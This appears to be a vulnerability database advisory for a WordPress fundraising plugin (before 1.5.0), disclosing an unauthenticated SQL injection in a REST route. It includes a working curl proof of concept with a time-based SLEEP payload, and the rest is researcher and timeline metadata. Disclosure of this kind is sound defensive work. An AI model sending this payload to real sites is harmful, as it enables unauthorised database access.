WordPress Plugin Vulnerabilities
WP Fundraising Donation and Crowdfunding Platform < 1.5.0 - Unauthenticated SQLi
Description
The plugin does not sanitise and escape a parameter before using it in a SQL statement via one of it's REST route, leading to an SQL injection exploitable by unauthenticated users
Proof of Concept
curl 'https://example.com/index.php?rest_route=/xs-donate-form/payment-redirect/3' \ --data '{"id": "(SELECT 1 FROM (SELECT(SLEEP(5)))me)", "formid": "1", "type": "online_payment"}' \ -X GET \ -H 'Content-Type: application/json'
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-11 (about 1 years ago)
Added
2022-05-11 (about 1 years ago)
Last Updated
2022-07-10 (about 1 years ago)